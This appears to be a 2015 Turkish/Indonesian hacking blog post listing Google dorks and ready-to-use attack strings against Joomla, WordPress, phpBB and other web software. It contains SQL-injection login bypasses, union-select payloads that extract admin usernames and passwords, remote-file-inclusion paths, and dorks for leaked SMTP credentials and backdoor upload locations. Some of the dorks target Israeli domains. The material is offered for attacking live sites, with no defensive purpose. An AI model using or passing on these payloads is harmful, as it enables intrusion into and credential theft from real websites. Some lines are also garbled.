24 Nisan 2015 Cuma

Özel Dorklar 2015

Sizin İçin Arşivden Çinurl:/login.php intext:"Welcome, Admin"
inurl:/panel/ intext:"Welcone, Admin"
inurl:/panel/ intext:"Welcone, Admin" ext:php
inurl:/manage/ ext:php
inurl:/admin/ ext:php
inurl:/admin2/ ext:php
inurl:/easy-comment-uploads/upload-form.php
inurl:index.php?option=com_fabrik

user : ' or 1=1 limit 1 -- -+
pass : ' or 1=1 limit 1 -- -+
' or 1=1--
'=' 'or'

----------------------------------------------------------------------------------

inurl:/cgi-bin/filechucker.cgi
intext:Toptown File Upload
inurl:/cgi-bin/filechucker.pl
intext:File Upload by Encodable


---------------------------------------------------------------------------------
1. Google dork = allinurl:option=com_user |==========================
[x]. Cek Vuln
site/index.php?option=com_user&view=reset&layout=confirm

[x]. Cek UID n Pass Admin
site/index.php?option=com_docman&task=doc_details&gid=3&Itemid=1
site/index.php?option=com_docman&task=doc_details&gid=3&Itemid=2
site/index.php?option=com_docman&task=doc_details&gid=3&Itemid=3

"sampai muncul tabel informasi"

[x]. Login
Site/administrator
______________________________________________________________________
2. Google dork = allinurl:mod.php?mod=publisher |
==============================
[x]. Cek Vuln
site/mod.php?mod=publisher&op=viewcat&cid=2'

[x]. Cek UID n Pass Admin
site/mod.php?mod=publisher&op=viewcat&cid=-2+union+all+select+1,group_concat(aid,0x3a,name,0x3a,pwd),3+from+authors--

[x]. Login
site/admin.php
______________________________________________________________________
3. Google dork = inurl:com_gameserver |
========================
[x]. Cek Vuln
Site/index.php?option=com_gameserver&view=gamepanel&id=3'

[x]. Cek UID n Pass Admin
site/index.php?option=com_gameserver&view=gamepanel&id=3+union+select+1,2,group_concat(username,char(58),password),4+from+jos_us​ers-–

[x]. Cek Login
site/path/path/path/admin
______________________________________________________________________
4. Google dork = inurl:com_digifolio |
======================
[x]. Cek Vuln
site/index.php?option=com_digifolio&view=project&id=2'

[x]. Cek UID n Pass Admin
site/index.php?option=com_digifolio&view=project&id=-2+union+all+select+1,group_concat(username,char(58),password),3+from+jos_users-–

[x]. Cek Login
site/admin
______________________________________________________________________
5. Google dork = inurl:com_siirler |
====================
[x]. Cek Vuln
site/index.php?option=com_siirler&task=sdetay&sid=
3'

[x]. Cek UID n Pass Admin

site/index.php?option=com_siirler&task=sdetay&sid=
-3+union+all+select+1,2,concat(username,char(58),password),4+from+jos_users–-

[x]. Cek Login
site/admin
______________________________________________________________________
6. Google dork = Powered by PHP Live! v3.3 |
============================
[x]. Cek Vuln
site/message_box.php?theme=&l=[username]&x=[xxx]&deptid=2'

[x]. Cek UID n Pass Admin
site/message_box.php?theme=&l=[username]&x=[xxx]&deptid=-2+union++all+select+1,group_concat(login,char(58),password),3,4,5+from+chat_admi​n–


[x]. Cek Login
site/admin
______________________________________________________________________
7. Google dork = allinurl:option=com_livechat |
============================
[x]. Cek Vuln
site/administrator/components/com_livechat/getChat.php?chat=0&last=3'

[x]. Cek UID n Pass Admin
site/administrator/components/com_livechat/getChat.php?chat=0&last=-3+union+all+select+1,2,unhex(hex(concat(username,0×3a,password))),4+from+"masih jadi misteri!!"
______________________________________________________________________
8. Google dork = allinurl:com_idoblog |
[x]. Cek Vuln
site/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62'

[x]. Cek UID n Pass Admin
site/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,concat_ws(0×3a,username,password)
,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users–





------------------------------------------------------------------------------------------------
[~] Dork:

inurl:option=com_sermonspeaker

[~] Vulnerable :

http://127.0.0.1/index.php?option=com_sermonspeaker&task=latest_sermons&id=[SQL]

[~] ExploiT :

-9999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/**/

[~] Example :

http://127.0.0.1/index.php?option=com_sermonspeaker&task=latest_sermons&id=
-9999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/**/

inurl:/kindeditor/examples/uploadbutton.html

------------------------------------------------------------------------------------------------inurl:index.php?CatId=
inurl:product.php?catid=[/color]
inurl:issues.php?catid=
inurl:cgi-bin/categories.php?catid=
inurl:newsdetail.php?catid=
inurl:classified-listing.php?catId=

-----------------------------------------------------------------

/includes/functions.php?phpbb_root_path=
/admin/admin_linkdb.php?phpbb_root_path=
/admin/admin_forum_prune.php?phpbb_root_path=
/admin/admin_extensions.php?phpbb_root_path=
/admin/admin_board.php?phpbb_root_path=
/admin/admin_attachments.php?phpbb_root_path=
/admin/admin_users.php?phpbb_root_path=
/includes/archive/archive_topic.php?phpbb_root_path=
/admin/modules_data.php?phpbb_root_path=
/faq.php?foing_root_path=
/index.php?foing_root_path=
/list.php?foing_root_path=
/login.php?foing_root_path=
/playlist.php?foing_root_path=
/song.php?foing_root_path=
/gen_m3u.php?foing_root_path=
/view_artist.php?foing_root_path=
/view_song.php?foing_root_path=
/login.php?foing_root_path=
/playlist.php?foing_root_path=
/song.php?foing_root_path=
/flash/set_na.php?foing_root_path=
/flash/initialise.php?foing_root_path=
/flash/get_song.php?foing_root_path=
/includes/common.php?foing_root_path=
/admin/nav.php?foing_root_path=
/admin/main.php?foing_root_path=
/admin/list_artists.php?foing_root_path=
/admin/index.php?foing_root_path=
/admin/genres.php?foing_root_path=
/admin/edit_artist.php?foing_root_path=
/admin/edit_album.php?foing_root_path=
/admin/config.php?foing_root_path=
/admin/admin_status.php?foing_root_path=
------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------

smtppass: ext:txt
inurl:webconfig password: ext:txt
inurl:config ext:txt
inurl:joomla smtppass: ext:txt
inurl:wp smtppass: ext:txt
langsung email
gmail smtppass: ext:txt
yahoo smtppass: ext:txt
--------------------------------------------------------
--------------------------------------------------------------Dork Com User-----------------------------------------------------
intext:Joomla! is a flexible and powerful platform, whether you are building a small site for yourself or a huge site with hundreds of thousands of visitors
intext:"joomla! 1.7 - Open Source Content Management" inurlConfusedaferpage.de
intext:"joomla! 1.7 - Open Source Content Management" inurl:cuwhois.com
intext:"joomla! 1.7 - Open Source Content Management" inurlConfusedtatmyweb.com
intext:"joomla! 1.7 - Open Source Content Management" inurl:domainsigma.com
intext:"joomla! 1.7 - Open Source Content Management" inurl:domainmetrics.de


Joomla 1.6
intext:"joomla! 1.6 - Open Source Content Management" inurlConfusedaferpage.de
intext:"joomla! 1.6 - Open Source Content Management" inurl:cuwhois.com
intext:"joomla! 1.6 - Open Source Content Management" inurlConfusedtatmyweb.com
intext:"joomla! 1.6 - Open Source Content Management" inurl:domainsigma.com
intext:"joomla! 1.6 - Open Source Content Management" inurl:domainmetrics.de
--------------------------------------------------------
inurl:/wp-content/themes/shepard
inurl:/wp-content/themes/money
inurl:/wp-content/themes/clockstone
inurl:/wp-content/themes/ambleside
inurl:/wp-content/themes/pacifico
inurl:ptype=store site: Exploit :/wp-content/themes/framework/upload/ hasil : /wp-content/uploads/products_img/[BACKDOORNAME.php]
inurl:"/wp-content/plugins/spotlightyour/"
----------------------------------------------------------
inurl:"id=" & intext:"Warning: preg_match() " site:.il
inurl:"id=" & intext:"Warning: ilesize() " site:.co.il
inurl:"id=" & intext:"Warning: filesize() " site:.co.il
inurl:"id=" & intext:"Warning: require() " site:.co.il
inurl:"id=" & intext:"Warning: mysql_fetch_assoc() " site:.co.il
inurl:"id=" & intext:"Warning: mysql_fetch_assoc() " site:.co.il
inurl:"id=" & intext:"Warning: mysql_fetch_assoc() " site:.co.il
inurl:"id=" & intext:"Warning: mysql_fetch_array() " site:.au
inurl:"id=" & intext:"Warning: mysql_num_rows() " site:.co.il
inurl:"id=" & intext:"Warning: session_start() " site:.il
inurl:"id=" & intext:"Warning: getimagesize() " site:.co.il
inurl:"id=" & intext:"Warning: is_writable() " site:.ca
inurl:"id=" & intext:"Warning: getimagesize() " site:.co.il
inurl:"id=" & intext:"Warning: Unknown() " site:.il
inurl:"id=" & intext:"Warning: session_start() " site:.il
inurl:"id=" & intext:"Warning: mysql_result() " site:.il
inurl:"id=" & intext:"Warning: pg_exec() " site:.il
inurl:"id=" & intext:"Warning: mysql_result() " site:.il
inurl:"id=" & intext:"Warning: mysql_num_rows() " site:.il
inurl:"id=" & intext:"Warning: mysql_query() " site:.il
inurl:"id=" & intext:"Warning: array_merge() " site:.co.ilıkarılan Dorklar 

0 yorum:

Yorum Gönder